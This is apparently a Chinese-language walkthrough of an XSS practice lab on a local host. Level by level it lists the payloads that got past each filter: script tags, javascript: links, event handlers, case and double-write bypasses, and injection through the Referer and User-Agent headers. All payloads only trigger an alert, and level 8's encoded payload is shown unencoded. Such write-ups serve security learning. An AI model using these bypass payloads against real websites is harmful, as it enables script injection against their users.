level 1

http://192.168.1.136:303/level1.php?name=<script>alert(/xss/)</script>

level 2

輸入:http://192.168.1.136:303/level2.php?keyword=<a href="javascript:alert(/xss/)">test</a>,發現出現">未閉合

檢視原始碼

重新閉合輸入
http://192.168.1.136:303/level2.php?keyword="><a href="javascript:alert(/xss/)">test</a>

level 3

輸入測試程式碼<script "' Oonn>

發現 < 和 > 都被轉義，這裡考慮用javascript事件實現xss

' onmouseover='alert(/xss/)

level 4

同上
" onmouseover="alert(/xss/)

level 5

script 和 on都被加了下劃線了，這裡使用a標籤繞過
"><a href="javascript:alert(/xss/)">clickme!</a>

level 6

還是script和on加下劃線，這次使用大小寫繞過
"><Script>alert(/xss/)</Script>

level 7

script 和 on 被直接過濾，可以採用雙寫繞過
"><scscriptript>alert(/xss/)</scscriptript>

level 8

javascript:alert(/xss/) 進行Unicode編碼javascript:alert(/xss/)

level 9

這裡驗證了http:// 欄位，javascript:alert('http://')

level 10

發現原始碼裡面的t_sort 欄位，可以進行注入
http://192.168.1.136:303/level10.php?t_sort=click here!" onmouseover=alert(/xss/) type="text"

level 11

referer注入：click" onmouseover=alert(/xss/) type="text"

level 12

User-Agent: 1" onfocus=alert(/xss/) type="text"

level 13-15

搭建環境原因，無法測試

level 16

script、/、空格 都被替換成
這裡考慮使用%0a替代空格
keyword=<button%0avalue="click"%0aonclick=alert('xss')>

剩下的環境不支援，載入不出來，就沒有繼續做了